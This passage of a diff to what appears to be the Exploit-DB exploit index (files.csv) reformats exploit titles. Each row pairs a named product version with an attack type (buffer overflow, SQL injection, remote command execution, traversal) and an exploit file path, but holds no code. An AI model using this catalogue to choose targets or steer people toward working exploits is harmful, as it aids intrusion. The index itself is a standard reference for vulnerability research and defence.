(2)",2003-04-24,jlanthea,linux,local,0 22539,platforms/php/webapps/22539.txt,"Xoops 1.3.x/2.0 MyTextSanitizer - HTML Injection",2003-04-25,magistrat,php,webapps,0 22540,platforms/linux/local/22540.c,"Linux-ATM LES 2.4 - Command Line Argument Buffer Overflow",2003-02-18,"Angelo Rosiello",linux,local,0 22541,platforms/cgi/remote/22541.txt,"Alt-N WebAdmin 2.0.x - Remote File Viewing",2003-04-25,david@kamborio.net,cgi,remote,0 @@ -19792,11 +19788,11 @@ id,file,description,date,author,platform,type,port 22543,platforms/php/webapps/22543.txt,"Onecenter Forum 4.0 - IMG Tag Script Injection",2003-04-25,"David F. Madrid",php,webapps,0 22544,platforms/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 - Error Message Path Disclosure",2003-04-26,"Network Intelligence",cfm,webapps,0 22545,platforms/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution",2003-04-26,aresu@bosen.net,cgi,webapps,0 -22546,platforms/windows/remote/22546.txt,"Opera 7.0/7.10 JavaScript Console Single Quote Attribute Injection",2003-04-28,nesumin,windows,remote,0 -22547,platforms/php/webapps/22547.php,"Invision Power Board 3.3.4 unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 +22546,platforms/windows/remote/22546.txt,"Opera 7.0/7.10 - JavaScript Console Single Quote Attribute Injection",2003-04-28,nesumin,windows,remote,0 +22547,platforms/php/webapps/22547.php,"Invision Power Board 3.3.4 - unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 22548,platforms/php/webapps/22548.txt,"Xivo 1.2 - Arbitrary File Download",2012-11-07,Mr.Un1k0d3r,php,webapps,0 -22549,platforms/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server Directory Traversal",2012-11-07,"Patrick Saladino",hardware,webapps,0 -22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos,0 +22549,platforms/hardware/webapps/22549.txt,"AVerCaster Pro RS3400 Web Server - Directory Traversal",2012-11-07,"Patrick Saladino",hardware,webapps,0 +22550,platforms/windows/dos/22550.pl,"Opera 6.0.x/7.0 - Long File Name Remote Heap Corruption",2003-04-28,"imagine & nesumin",windows,dos,0 22551,platforms/windows/dos/22551.pl,"3D-FTP Client 4.0 - Buffer Overflow",2003-04-28,Over_G,windows,dos,0 22552,platforms/hp-ux/dos/22552.txt,"HP-UX 10.x/11.x - RExec Remote Username Flag Local Buffer Overrun",2003-04-29,"Davide Del Vecchio",hp-ux,dos,0 22553,platforms/windows/dos/22553.txt,"Microsoft BizTalk Server 2002 - HTTP Receiver Buffer Overflow",2003-04-30,"Cesar Cerrudo",windows,dos,0 @@ -19812,10 +19808,10 @@ id,file,description,date,author,platform,type,port 22563,platforms/windows/remote/22563.pl,"Microsoft IIS 5 - User Existence Disclosure (2)",1999-02-24,JeiAr,windows,remote,0 22564,platforms/windows/local/22564.c,"FlashFXP 1.4 - User Password Encryption Weakness",2003-05-05,DVDMAN,windows,local,0 22565,platforms/linux/local/22565.c,"MySQL 3.x/4.0.x - Weak Password Encryption",2003-05-05,"Secret Squirrel",linux,local,0 -22566,platforms/freebsd/local/22566.pl,"Youbin 2.5/3.0/3.4 HOME Buffer Overflow",2003-05-06,"Knud Erik Hojgaard",freebsd,local,0 +22566,platforms/freebsd/local/22566.pl,"Youbin 2.5/3.0/3.4 - HOME Buffer Overflow",2003-05-06,"Knud Erik Hojgaard",freebsd,local,0 22567,platforms/linux/local/22567.c,"Leksbot 1.2 - Multiple Unspecified Vulnerabilities",2003-05-06,gunzip,linux,local,0 -22568,platforms/windows/dos/22568.pl,"Floosietek FTGate PRO 1.22 SMTP MAIL FROM Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos,0 -22569,platforms/windows/dos/22569.pl,"Floosietek FTGate PRO 1.22 SMTP RCPT TO Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos,0 +22568,platforms/windows/dos/22568.pl,"Floosietek FTGate PRO 1.22 - SMTP MAIL FROM Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos,0 +22569,platforms/windows/dos/22569.pl,"Floosietek FTGate PRO 1.22 - SMTP RCPT TO Buffer Overflow",2003-05-06,"Dennis Rand",windows,dos,0 22572,platforms/cgi/webapps/22572.pl,"HappyMall E-Commerce Software 4.3/4.4 - Member_HTML.CGI Command Execution",2003-05-08,"Revin Aldi",cgi,webapps,0 22573,platforms/freebsd/local/22573.pl,"ListProc 8.2.9 Catmail ULISTPROC_UMASK Buffer Overflow",2003-05-08,kf,freebsd,local,0 22574,platforms/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption",2003-05-09,"Knud Erik Hojgaard",freebsd,local,0 @@ -19824,11 +19820,11 @@ id,file,description,date,author,platform,type,port 22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 - / ttForum 1.1 News.php template Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 - / ttForum 1.1 install.php installdir Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22579,platforms/php/webapps/22579.txt,"Phorum 3.4.x - Message Form Field HTML Injection Variant",2003-05-09,WiciU,php,webapps,0 -22580,platforms/freebsd/local/22580.c,"Firebird 1.0 GDS_Inet_Server Interbase Environment Variable Buffer Overflow",2003-05-10,bob,freebsd,local,0 +22580,platforms/freebsd/local/22580.c,"Firebird 1.0 - GDS_Inet_Server Interbase Environment Variable Buffer Overflow",2003-05-10,bob,freebsd,local,0 22581,platforms/windows/dos/22581.pl,"Youngzsoft CMailServer 4.0 - MAIL FROM Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 22582,platforms/windows/dos/22582.pl,"Youngzsoft CMailServer 4.0 - RCPT TO Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 22583,platforms/asp/webapps/22583.pl,"Snitz Forums 2000 - Register.ASP SQL Injection",2003-05-10,sharpiemarker,asp,webapps,0 -22584,platforms/linux/remote/22584.txt,"Info-ZIP UnZip 5.50 Encoded Character Hostile Destination Path",2003-05-10,Jelmer,linux,remote,0 +22584,platforms/linux/remote/22584.txt,"Info-ZIP UnZip 5.50 - Encoded Character Hostile Destination Path",2003-05-10,Jelmer,linux,remote,0 22585,platforms/windows/dos/22585.pl,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (1)",2003-05-11,"Matthew Murphy",windows,dos,0 22586,platforms/windows/dos/22586.c,"EType EServ 2.98/2.99/3.0 - Resource Exhaustion Denial of Service (2)",2003-05-11,rash,windows,dos,0 22587,platforms/windows/dos/22587.c,"Pi3Web 2.0.1 - Malformed GET Request Denial of Service",2003-04-26,"Angelo Rosiello",windows,dos,0 @@ -19838,11 +19834,11 @@ id,file,description,date,author,platform,type,port 22591,platforms/windows/dos/22591.txt,"Microsoft Office Excel 2007 - WriteAV Crash PoC",2012-11-09,coolkaveh,windows,dos,0 22592,platforms/cgi/webapps/22592.txt,"Happymall E-Commerce Software 4.3/4.4 - Normal_HTML.CGI File Disclosure",2003-05-12,"Julio Cesar",cgi,webapps,0 22593,platforms/windows/remote/22593.html,"Yahoo! Voice Chat ActiveX Control 1.0.0.43 - Buffer Overflow",2003-05-12,cesaro,windows,remote,0 -22594,platforms/linux/local/22594.c,"CDRTools CDRecord 1.11/2.0 Devname Format String",2003-05-13,CMN,linux,local,0 +22594,platforms/linux/local/22594.c,"CDRTools CDRecord 1.11/2.0 - Devname Format String",2003-05-13,CMN,linux,local,0 22595,platforms/php/webapps/22595.txt,"PHP-Nuke 6.5 - Modules.php Username URI Parameter Cross-Site Scripting",2003-05-13,"Ferruh Mavituna",php,webapps,0 22596,platforms/hardware/dos/22596.txt,"Verilink NetEngine 6100-4 Broadband Router - TFTP Packet Remote Denial of Service",2003-05-08,"Lorenzo Cerulli and Fabio Annunziato",hardware,dos,0 22597,platforms/php/webapps/22597.txt,"PHP-Nuke 6.5 - Multiple Downloads Module SQL Injection",2003-05-13,"Albert Puigsech Galicia",php,webapps,0 -22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module Path Disclosure",2003-05-13,"Rynho Zeros Web",php,webapps,0 +22598,platforms/php/webapps/22598.txt,"PHP-Nuke 6.0/6.5 Web_Links Module - Path Disclosure",2003-05-13,"Rynho Zeros Web",php,webapps,0 22599,platforms/php/webapps/22599.html,"vBulletin 3.0 - Private Message HTML Injection",2003-05-14,"Ferruh Mavituna",php,webapps,0 22600,platforms/php/webapps/22600.txt,"Owl Intranet Engine 0.7 - Authentication Bypass",2003-05-14,cdowns,php,webapps,0 22601,platforms/linux/remote/22601.txt,"Inktomi Traffic Server 4.0/5.x - Cross-Site Scripting",2003-05-14,"Hugo Vazquez",linux,remote,0 @@ -19853,7 +19849,7 @@ id,file,description,date,author,platform,type,port 22606,platforms/php/webapps/22606.py,"OneOrZero Helpdesk 1.4 - Install.php Administrative Access",2003-05-15,frog,php,webapps,0 22607,platforms/php/webapps/22607.txt,"EZ Publish 2.2 - Index.php IMG Tag Cross-Site Scripting",2003-05-16,"Ferruh Mavituna",php,webapps,0 22608,platforms/windows/dos/22608.txt,"Snowblind Web Server 1.0/1.1 - Malformed HTTP Request Denial of Service",2003-05-16,euronymous,windows,dos,0 -22609,platforms/windows/remote/22609.txt,"Snowblind 1.0/1.1 Web Server File Disclosure",2003-05-16,euronymous,windows,remote,0 +22609,platforms/windows/remote/22609.txt,"Snowblind 1.0/1.1 - Web Server File Disclosure",2003-05-16,euronymous,windows,remote,0 22610,platforms/windows/dos/22610.txt,"Snowblind Web Server 1.0/1.1 - HTTP GET Request Buffer Overflow",2003-05-16,euronymous,windows,dos,0 22611,platforms/multiple/remote/22611.txt,"Netscape Enterprise Server 3.x/4.x - PageServices Information Disclosure",1998-08-16,anonymous,multiple,remote,0 22612,platforms/php/webapps/22612.txt,"ttCMS 2.2/2.3 - Header.php Remote File Inclusion",2003-05-17,ScriptSlave@gmx.net,php,webapps,0 @@ -19872,7 +19868,7 @@ id,file,description,date,author,platform,type,port 22625,platforms/php/webapps/22625.txt,"SudBox Boutique 1.2 - login.php Authentication Bypass",2003-05-21,frog,php,webapps,0 22626,platforms/hardware/remote/22626.txt,"Axis Network Camera 2.x - HTTP Authentication Bypass",2003-05-27,"Juliano Rizzo",hardware,remote,0 22627,platforms/windows/remote/22627.pl,"Qualcomm Eudora 5.2.1/6.0 - File Attachment Spoofing Variant",2003-05-22,"Paul Szabo",windows,remote,0 -22628,platforms/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 LSF_ENVDIR Local Command Execution",2003-03-20,"Tomasz Grabowski",multiple,local,0 +22628,platforms/multiple/local/22628.sh,"Platform Load Sharing Facility 4/5 - LSF_ENVDIR Local Command Execution",2003-03-20,"Tomasz Grabowski",multiple,local,0 22629,platforms/osx/dos/22629.txt,"Apple QuickTime/Darwin Streaming Server 4.1.3 QTSSReflector Module - Integer Overflow",2003-05-22,"Sir Mordred",osx,dos,0 22630,platforms/osx/remote/22630.txt,"Apple QuickTime/Darwin Streaming MP3Broadcaster - ID3 Tag Handling",2003-05-22,"Sir Mordred",osx,remote,0 22631,platforms/windows/remote/22631.txt,"IISProtect 2.1/2.2 - Authentication Bypass",2003-05-22,iDefense,windows,remote,0 @@ -19924,7 +19920,7 @@ id,file,description,date,author,platform,type,port 22677,platforms/windows/remote/22677.txt,"M-TECH P-Synch 6.2.5 - nph-psa.exe css Parameter XSS",2003-05-29,JeiAr,windows,remote,0 22678,platforms/windows/remote/22678.rb,"Jira Scriptrunner 2.0.7 - CSRF/RCE Exploit (Metasploit)",2012-11-13,"Ben Sheppard",windows,remote,0 22679,platforms/windows/dos/22679.txt,"Microsoft Visio 2010 - Crash PoC",2012-11-13,coolkaveh,windows,dos,0 -22680,platforms/windows/dos/22680.txt,"IrfanView RLE Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 +22680,platforms/windows/dos/22680.txt,"IrfanView - .RLE Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 22681,platforms/windows/dos/22681.txt,"IrfanView - .TIF Image Decompression Buffer Overflow",2012-11-13,"Francis Provencher",windows,dos,0 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 @@ -19946,13 +19942,13 @@ id,file,description,date,author,platform,type,port 22700,platforms/linux/dos/22700.c,"MyServer 0.4.3 - HTTP GET Argument Buffer Overflow",2003-09-08,badpack3t,linux,dos,0 22701,platforms/linux/dos/22701.c,"MyServer 0.5 - HTTP GET Argument Buffer Overflow",2003-09-08,badpack3t,linux,dos,0 22702,platforms/php/webapps/22702.pl,"Webfroot Shoutbox 2.32 - Expanded.php Remote Command Execution",2003-06-02,_6mO_HaCk,php,webapps,0 -22703,platforms/linux/local/22703.c,"XMame 0.6x Lang Local Buffer Overflow",2003-03-31,"Gabriel A. Maggiotti",linux,local,0 +22703,platforms/linux/local/22703.c,"XMame 0.6x - Lang Local Buffer Overflow",2003-03-31,"Gabriel A. Maggiotti",linux,local,0 22704,platforms/php/webapps/22704.txt,"Webchat 2.0 Module - Path Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 22705,platforms/php/webapps/22705.txt,"Webfroot Shoutbox 2.32 - Expanded.php Remote Directory Traversal",2003-06-02,_6mO_HaCk,php,webapps,0 22706,platforms/windows/dos/22706.asm,"Crob FTP Server 2.50.4 - Remote Username Format String",2003-06-02,"Luca Ercoli",windows,dos,0 22707,platforms/windows/dos/22707.txt,"Novell Groupwise Internet Agent LDAP BIND Request Overflow",2012-11-14,"Francis Provencher",windows,dos,0 22708,platforms/php/webapps/22708.txt,"dotproject 2.1.6 - Remote File Inclusion",2012-11-14,dun,php,webapps,0 -22709,platforms/php/webapps/22709.txt,"Narcissus Remote Command Execution",2012-11-14,dun,php,webapps,0 +22709,platforms/php/webapps/22709.txt,"Narcissus - Remote Command Execution",2012-11-14,dun,php,webapps,0 22713,platforms/php/webapps/22713.txt,"MYRE Realty Manager - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager - SQL Injection (Auth Bypass)",2012-11-14,d3b4g,php,webapps,0 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 @@ -19961,18 +19957,18 @@ id,file,description,date,author,platform,type,port 22715,platforms/php/webapps/22715.txt,"WebChat 2.0 - Users.php Database Username Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 22716,platforms/php/webapps/22716.txt,"WebChat 2.0 - Users.php Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module - Remote File Inclusion",2003-06-02,"Rynho Zeros Web",php,webapps,0 -22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 SortName Buffer Overflow",2003-06-02,posidron,windows,dos,0 +22718,platforms/windows/dos/22718.c,"Pi3Web 2.0.2 - SortName Buffer Overflow",2003-06-02,posidron,windows,dos,0 22719,platforms/linux/local/22719.pl,"kon2 - Local Buffer Overflow (1)",2003-06-03,wsxz,linux,local,0 22720,platforms/linux/local/22720.c,"kon2 - Local Buffer Overflow (2)",2003-06-03,c0ntex,linux,local,0 22721,platforms/windows/remote/22721.txt,"Pablo Software Solutions FTP Service 1.2 - Anonymous Users Privileges",2003-06-03,JeiAr,windows,remote,0 -22722,platforms/windows/remote/22722.txt,"Pablo Software Solutions FTP Service 1.2 Plaintext Password Weakness",2003-06-03,JeiAr,windows,remote,0 +22722,platforms/windows/remote/22722.txt,"Pablo Software Solutions FTP Service 1.2 - Plaintext Password Weakness",2003-06-03,JeiAr,windows,remote,0 22723,platforms/windows/remote/22723.txt,"MegaBrowser 0.3 - HTTP Directory Traversal File Disclosure",2003-06-04,JeiAr,windows,remote,0 22724,platforms/asp/webapps/22724.txt,"Xpressions Interactive - Multiple SQL Injection",2003-06-04,"Paul Craig",asp,webapps,0 -22725,platforms/php/webapps/22725.txt,"PHP 4 PHPInfo Cross-Site Scripting",2002-10-12,"Matthew Murphy",php,webapps,0 +22725,platforms/php/webapps/22725.txt,"PHP 4 - PHPInfo Cross-Site Scripting",2002-10-12,"Matthew Murphy",php,webapps,0 22726,platforms/windows/remote/22726.txt,"Microsoft Internet Explorer 5 - OBJECT Tag Buffer Overflow",2003-06-04,FelineMenace,windows,remote,0 22727,platforms/multiple/local/22727.pl,"Computer Associates Unicenter Asset Manager Stored Secret Data Decryption Weakness",2003-03-19,kufumo.com,multiple,local,0 22728,platforms/windows/remote/22728.txt,"Microsoft Internet Explorer 5 - Classic Mode FTP Client Cross Domain Scripting",2003-06-04,"Matthew Murphy",windows,remote,0 -22729,platforms/linux/local/22729.c,"Man 1.5.1 0 Catalog File Format String",2003-06-04,V9,linux,local,0 +22729,platforms/linux/local/22729.c,"Man 1.5.1 - Catalog File Format String",2003-06-04,V9,linux,local,0 22730,platforms/asp/webapps/22730.txt,"Mailtraq 2.2 - Browse.ASP Cross-Site Scripting",2003-06-04,"Ziv Kamir",asp,webapps,0 22731,platforms/asp/webapps/22731.txt,"Mailtraq 2.2 - Webmail Utility Path Disclosure",2003-06-04,"Ziv Kamir",asp,webapps,0 22732,platforms/multiple/local/22732.java,"Sun JRE/SDK 1.x - Untrusted Applet Java Security Model Violation",2003-06-05,"Marc Schoenefeld",multiple,local,0 @@ -19982,7 +19978,7 @@ id,file,description,date,author,platform,type,port 22736,platforms/php/webapps/22736.txt,"Friends in War Make or Break 1.3 - SQL Injection (Auth Bypass)",2012-11-15,d3b4g,php,webapps,0 22737,platforms/windows/remote/22737.txt,"Novell NetIQ Privileged User Manager 2.3.1 - auth.dll pa_modify_accounts() RCE",2012-11-15,rgod,windows,remote,0 22738,platforms/windows/remote/22738.txt,"Novell NetIQ Privileged User Manager 2.3.1 - ldapagnt.dll ldapagnt_eval() Perl Code Evaluation RCE",2012-11-15,rgod,windows,remote,0 -22739,platforms/hardware/dos/22739.py,"Broadcom DoS on BCM4325 and BCM4329 Devices",2012-11-15,CoreLabs,hardware,dos,0 +22739,platforms/hardware/dos/22739.py,"Broadcom BCM4325 and BCM4329 Devices - DoS",2012-11-15,CoreLabs,hardware,dos,0 22741,platforms/php/webapps/22741.txt,"BabyGekko 1.2.2e - Multiple Vulnerabilities",2012-11-15,"High-Tech Bridge SA",php,webapps,0 22742,platforms/php/webapps/22742.txt,"ReciPHP 1.1 - SQL Injection",2012-11-15,"cr4wl3r ",php,webapps,0 22743,platforms/cgi/webapps/22743.txt,"ImageFolio 2.2x/3.0/3.1 - Admin.CGI Directory Traversal",2003-06-05,"Paul Craig",cgi,webapps,0 @@ -19998,23 +19994,23 @@ id,file,description,date,author,platform,type,port 22753,platforms/cgi/remote/22753.pl,"MNOGoSearch 3.1.20 - Search.CGI UL Buffer Overflow (1)",2003-06-10,pokleyzz,cgi,remote,0 22754,platforms/cgi/remote/22754.pl,"MNOGoSearch 3.1.20 - Search.CGI UL Buffer Overflow (2)",2003-06-10,inv,cgi,remote,0 22755,platforms/multiple/remote/22755.txt,"Aiglon Web Server 2.0 - Installation Path Information Disclosure Weakness",2003-06-10,"Ziv Kamir",multiple,remote,0 -22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 LSMCODE Environment Variable Local Buffer Overflow",2003-06-01,watercloud,aix,local,0 +22756,platforms/aix/local/22756.pl,"IBM AIX 4.3.x/5.1 - LSMCODE Environment Variable Local Buffer Overflow",2003-06-01,watercloud,aix,local,0 22757,platforms/windows/dos/22757.c,"ArGoSoft Mail Server 1.8.3.5 - Multiple GET Requests Denial of Service",2003-06-11,posidron,windows,dos,0 22758,platforms/windows/remote/22758.txt,"silentthought simple Web server 1.0 - Directory Traversal",2003-06-12,"Ziv Kamir",windows,remote,0 22759,platforms/windows/dos/22759.txt,"WebBBS Pro 1.18 - GET Request Denial of Service",2003-06-12,"Ziv Kamir",windows,dos,0 22760,platforms/php/webapps/22760.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Account Configuration Modification",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22761,platforms/php/webapps/22761.txt,"PostNuke 0.723 - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"David F. Madrid",php,webapps,0 -22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22762,platforms/php/webapps/22762.txt,"Sphera HostingDirector 1.0/2.0/3.0 VDS Control Panel - Multiple Cross-Site Scripting Vulnerabilities",2003-06-13,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22829,platforms/php/webapps/22829.txt,"webid 1.0.5 - Directory Traversal",2012-11-19,loneferret,php,webapps,80 22767,platforms/php/webapps/22767.txt,"PostNuke 0.723 - User.php UNAME Cross-Site Scripting",2003-06-13,"David F. Madrid",php,webapps,0 22768,platforms/linux/local/22768.pl,"ATFTP 0.7 - Timeout Command Line Argument Local Buffer Overflow",2003-06-06,"Julien LANTHEA",linux,local,0 -22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server File Disclosure",2003-06-13,"Peter Winter-Smith",windows,remote,0 +22769,platforms/windows/remote/22769.txt,"Methodus 3 Web Server - File Disclosure",2003-06-13,"Peter Winter-Smith",windows,remote,0 22770,platforms/cgi/webapps/22770.txt,"Infinity CGI Exploit Scanner 3.11 - Cross-Site Scripting",2003-06-12,badpack3t,cgi,webapps,0 22771,platforms/linux/remote/22771.txt,"Adobe Acrobat Reader (UNIX) 5.0 6 / Xpdf 0.9x Hyperlinks - Arbitrary Command Execution",2003-06-13,"Martyn Gilmore",linux,remote,0 22766,platforms/php/webapps/22766.txt,"friendsinwar FAQ Manager - (view_faq.php question param) SQL Injection",2012-11-16,unsuprise,php,webapps,0 22772,platforms/cgi/webapps/22772.txt,"Infinity CGI Exploit Scanner 3.11 - Remote Command Execution",2003-06-12,badpack3t,cgi,webapps,0 22773,platforms/linux/local/22773.c,"Progress Database 9.1 - Environment Variable Local Privilege Escalation",2003-06-14,kf,linux,local,0 -22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 Signal Handling Denial of Service",2003-06-14,LynX,windows,dos,0 +22774,platforms/windows/dos/22774.txt,"myServer 0.4.1 - Signal Handling Denial of Service",2003-06-14,LynX,windows,dos,0 22775,platforms/linux/local/22775.txt,"FreeWnn 1.1.1 JServer Logging Option Data Corruption",2003-06-14,"Stefano Di Paola",linux,local,0 22776,platforms/php/webapps/22776.txt,"PMachine 2.2.1 - Lib.Inc.php Remote File Inclusion Command Execution",2003-06-15,frog,php,webapps,0 22777,platforms/cgi/webapps/22777.txt,"LedNews 0.7 Post Script - Code Injection",2003-06-16,"gilbert vilvoorde",cgi,webapps,0 @@ -20028,24 +20024,24 @@ id,file,description,date,author,platform,type,port 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 - HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0 22786,platforms/linux/remote/22786.c,"Dune 0.6.7 - HTTP Get Remote Buffer Overrun",2003-06-17,V9,linux,remote,0 22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record - File Upload RCE",2012-11-19,Metasploit,windows,remote,0 -22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g Remote Username Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 -22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 -22790,platforms/windows/dos/22790.txt,"GuildFTPD 0.999.8 CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 +22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g - Remote Username Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 +22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g - Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 +22790,platforms/windows/dos/22790.txt,"GuildFTPD 0.999.8 - CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 22791,platforms/php/webapps/22791.txt,"SquirrelMail 1.2.11 - move_messages.php Arbitrary File Moving",2003-06-17,dr_insane,php,webapps,0 22792,platforms/php/webapps/22792.txt,"SquirrelMail 1.2.11 - Administrator Plugin options.php Arbitrary Admin Account Creation",2003-06-17,dr_insane,php,webapps,0 -22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11",2003-06-17,dr_insane,php,webapps,0 +22793,platforms/php/webapps/22793.txt,"SquirrelMail 1.2.11 - Exploit",2003-06-17,dr_insane,php,webapps,0 22794,platforms/windows/dos/22794.txt,"Proxomitron Proxy Server - Long Get Request Remote Denial of Service",2003-06-17,dr_insane,windows,dos,0 22795,platforms/windows/remote/22795.txt,"MiniHTTPServer WebForums Server 1.x/2.0 - Remote Directory Traversal",2003-06-18,dr_insane,windows,remote,0 -22796,platforms/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",linux,dos,0 -22797,platforms/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos,0 +22796,platforms/linux/dos/22796.php,"MidHosting FTP Daemon 1.0.1 - Shared Memory Local Denial of Service",2003-06-18,"Frank DENIS",linux,dos,0 +22797,platforms/hardware/dos/22797.txt,"Avaya Cajun P130/P133/P330/P333 Network Switch - Connection Stalling Denial of Service",2003-06-18,"Jacek Lipkowski",hardware,dos,0 22798,platforms/php/webapps/22798.txt,"phpMyAdmin 2.x - Information Disclosure",2003-06-18,"Lorenzo Manuel Hernandez Garcia-Hierro",php,webapps,0 -22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 -22800,platforms/linux/dos/22800.txt,"Kerio Mailserver 5.6.3 subscribe Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 +22799,platforms/cgi/webapps/22799.txt,"Kerio MailServer 5.6.3 - Web Mail ADD_ACL Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 +22800,platforms/linux/dos/22800.txt,"Kerio Mailserver 5.6.3 subscribe Module - Overflow",2003-06-18,"David F.Madrid",linux,dos,0 22801,platforms/linux/dos/22801.txt,"Kerio Mailserver 5.6.3 - add_acl Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 -22802,platforms/linux/dos/22802.txt,"Kerio Mailserver 5.6.3 list Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 -22803,platforms/linux/dos/22803.txt,"Kerio Mailserver 5.6.3 do_map Module Overflow",2003-06-18,"David F.Madrid",linux,dos,0 -22804,platforms/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 -22805,platforms/jsp/webapps/22805.txt,"Tmax Soft JEUS 3.1.4 p1 URL.JSP Cross-Site Scripting",2003-06-17,"Jeremy Bae",jsp,webapps,0 +22802,platforms/linux/dos/22802.txt,"Kerio Mailserver 5.6.3 list Module - Overflow",2003-06-18,"David F.Madrid",linux,dos,0 +22803,platforms/linux/dos/22803.txt,"Kerio Mailserver 5.6.3 do_map Module - Overflow",2003-06-18,"David F.Madrid",linux,dos,0 +22804,platforms/cgi/webapps/22804.txt,"Kerio MailServer 5.6.3 - Web Mail DO_MAP Module Cross-Site Scripting",2003-06-18,"David F.Madrid",cgi,webapps,0 +22805,platforms/jsp/webapps/22805.txt,"Tmax Soft JEUS 3.1.4 p1 - URL.JSP Cross-Site Scripting",2003-06-17,"Jeremy Bae",jsp,webapps,0 22806,platforms/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Local Privilege Escalation",2003-06-19,V9,linux,local,0 22807,platforms/windows/remote/22807.txt,"SurfControl Web Filter 4.2.0.1 - File Disclosure",2003-06-19,"thomas adams",windows,remote,0 22808,platforms/php/webapps/22808.txt,"pMachine 1.0/2.x - /lib/ Multiple Script Direct Request Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 @@ -20054,7 +20050,7 @@ id,file,description,date,author,platform,type,port 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 - Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0 22812,platforms/php/webapps/22812.txt,"WebJeff Filemanager 1.6 - File Disclosure",2003-06-20,"Adam Stephens",php,webapps,0 22813,platforms/linux/local/22813.c,"Linux Kernel 2.2.x / 2.4.x - /proc Filesystem Potential Information Disclosure",2003-06-20,IhaQueR,linux,local,0 -22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 PR-Edit Command Line Option Heap Corruption Vulnerablity",2003-06-21,"dong-h0un U",linux,dos,0 +22814,platforms/linux/dos/22814.txt,"GNU GNATS 3.0 02 - PR-Edit Command Line Option Heap Corruption Vulnerablity",2003-06-21,"dong-h0un U",linux,dos,0 22815,platforms/linux/local/22815.c,"GNU GNATS 3.113 - Environment Variable Buffer Overflow",2003-06-21,Xpl017Elz,linux,local,0 